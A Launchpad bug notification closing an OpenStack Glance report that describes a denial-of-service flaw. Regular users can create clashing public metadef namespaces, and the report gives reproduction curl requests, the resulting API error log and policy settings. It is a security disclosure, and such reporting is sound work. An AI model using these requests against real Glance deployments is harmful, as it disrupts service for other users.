[Yahoo-eng-team] [Bug 1479385] Re: Cause conflicts within glance public metadefs

Mon, 17 Mar 2025 13:15:52 -0700 

This was fixed in master, and Juno/Kilo are long gone, so closing this
report.

** Changed in: glance
       Status: Triaged => Won't Fix

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to Glance.
https://bugs.launchpad.net/bugs/1479385

Title:
  Cause conflicts within glance public metadefs

Status in Glance:
  Won't Fix
Status in OpenStack Security Advisory:
  Won't Fix

Bug description:
  Overview:

  Through creation of a new public namespace by any user of the system,
  you can create a clash of namespaces, that breaks all accessibility to
  that namespace. This therefore can be used to cause a denial of
  service attack or you have to disable the service completely.

  How to produce:

  As a regular user run the command:
  curl -v -X POST http://16.49.138.140:9292/v2/metadefs/namespaces -H 
"Content-Type: application/json" -H "X-Auth-Token: 
1a499605071a46a8b9b2a938fac5fac7" -d '{"namespace": "OS::Computer::WebServers", 
"visibility": "public"}'

  This will create a new namespace with the same name as the existing 
namespace. This has now rendered the original namespace inaccessible. If a GET 
request is done to the namespaces name by any other user via (or viewing in 
horizon):
  curl -v -X GET 
http://16.49.138.140:9292/v2/metadefs/namespaces/OS::Computer::WebServers -H 
"Content-Type: application/json" -H "X-Auth-Token: 
1a499605071a46a8b9b2a938fac5fac7"

  It will cause the following output in the api console:
  2015-07-28 23:41:42.175 ERROR glance.api.v2.metadef_properties 
[req-e3a80995-6f37-4e5c-b7dd-a1ce978478c7 f76c222365fb490792300f9e49ec9bd0 
9db14ac3320b4396b58222f99dd04e4e] Multiple rows were found for one()

  Returning a 500 to the user and therefore the namespace inaccessible
  meaning a successful denial of service to most of the metadefs api as
  most require it.

  Attempted preventative measures:
  In the policy.json files there are only the following values:
  "get_metadef_namespace": "",
   "get_metadef_namespaces":"",
   "modify_metadef_namespace":"",
  "add_metadef_namespace":"",
  meaning that creating namespaces has to be disabled completely(not default ) 
as there in no publicize option.

To manage notifications about this bug go to:
https://bugs.launchpad.net/glance/+bug/1479385/+subscriptions


-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to     : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp

Reply via email to